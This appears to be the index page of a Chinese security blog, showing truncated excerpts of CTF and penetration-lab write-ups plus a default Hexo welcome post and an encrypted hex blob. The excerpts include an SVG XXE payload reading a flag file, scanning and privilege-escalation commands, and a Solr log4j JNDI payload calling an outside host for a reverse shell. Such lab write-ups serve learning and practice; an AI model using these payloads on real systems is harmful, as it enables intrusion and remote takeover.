荒海听雪眠

WEBupload EzSerialize链子一眼穿 看start.sh UploadKingsvg打xxe 12345<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [ <!ENTITY file SYSTEM "file:///flag" > ]><svg height="100" width="1000"><text x="10" y="20">&file;</text></svg> CRYPTORSA_Common_Attack共模攻击 123456789101112131415161718from gmpy2 import *from Crypto.Util.number import *c1= 902947871638340144585350496607905036788 ...

IP拿到就是扫 1fscan.exe -h 39.98.117.35 MSSQL-getshellmssql弱口令，直连MDUT，直接上vshell 看目录发现需要提权 🥔提权-getflag1直接甜土豆win！ 1C:/Users/Public/Downloads/SweetPotato1.exe -a "whoami" 高权限再次运行马，获得system-shell 1flag{2ef328ee-0ff4-4c7b-bd0d-c822b73827f5} usersession？那是啥？ 隧道+内网信息收集fscan继续扫 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566172.22.8.18WIN-WEB已拿下172.22.8.15DC:XIAORANG\DC01Open 172.22.8.15:53Open 172.22.8. ...

信息收集拿到ip直接访问仍然啥也没有，上fscan扫 1fscan.exe -h 39.98.108.27 还是啥也没有，使用rustscan做全端口扫描，然后用fscan进行端口信息收集 1rustscan.exe -a 39.98.108.27 -r 1-65535 1fscan.exe -h 39.98.108.27 -p 1337,7473,7474,7687,35145 7474-Neo4j-CVE-2021-34371 反弹shell后wget vshell马 1flag{838821b4-1509-4f21-b121-3fd2135a666c} 提示：Kerberos 内网信息收集+隧道123456789101112131415161718192021222324252627282930313233343536373839404142434445172.22.6.12 DC:DC-PROGAME.xiaorang.labOpen 172.22.6.12:53Open 172.22.6.12:135Open 172.2 ...

信息收集到手ip直接fscan 8080端口存在web；8009不给访问，上dirsearch扫8080 存在tomcat路由 http://39.98.108.27:8080/docs/ cve-2020-1938搜索漏洞 poc直接读取web.xml 存在文件上传接口(http://39.98.108.27:8080/UploadServlet) CNVD-2020-104871python ajpShooter.py http://39.98.108.27:8080 8009 /upload/c953672209c1c9411df8253d5e1344c2/20250914045300403.txt eval 顺手wget venom/fscan 12扫出了.45的ms17-010扫出了.26的cve-2020-0796 建隧道打172.22.11.45 ms17-010 1flag{1a528a49-5f65-493e-9713-b3354f003cdb} 打172.22.11.26 CVE-202 ...

环境开起来fscan扫，没出漏洞 直接上Tscan，没啥有用的扫出来 goby扫扫 两个误报 本地漏洞库没有相关记录 事已至此只能看wp发现是打一个log4j组件漏洞，顺从了 solr的log4j组件漏洞12345java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 124.70.133.212http://39.99.148.57:8983/solr/admin/cores?action=${jndi:ldap://124.70.133.212:1389/Basic/ReverseShell/124.70.133.212/1122}nc -lvvp 1122 命令上线vshell 简单传个fscan\venom\CS二开linux🐎 上线CS socks代理 fscan开扫 fscan信息整理 1234567891011172.22.9.19 本机linux存在xiaorang.lab域172.22.9.7 XIAORANG-DC172.22.9.26 DESKTOP-CBKTVMO172.22.9.47 2 ...

517580c34402ec1a2e45617ddfd21d80edb6b0545796e0e8096ed15e258c1b88d20f05c43de8a913634a9344888b9e19a8ddfbeca5e19677ca13d6539a156970c00cc0d71fd8b0e4adbc3401492c91dcb1062e190538f5932afd823aa6fb3b5114f222fd4d5e8333a885eb8e63b5a776973d4f54739ad3ce2656f30b99f19e3dc14ab01ae42eb76d1e6d96aa1ba7943ce7def004aab2736ebc2c4f2766c4e042ba18924de7ca9bdfc9e71a429825e4ffc003b438d68eecbabb561844fdb47d11a46838da802c2100744b80a8448003d614c26b8bf55a2093bfc974b7e6d4d1e64757799641df3560d2b0165e7570b144dbfc4ab2cf9288730 ...

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment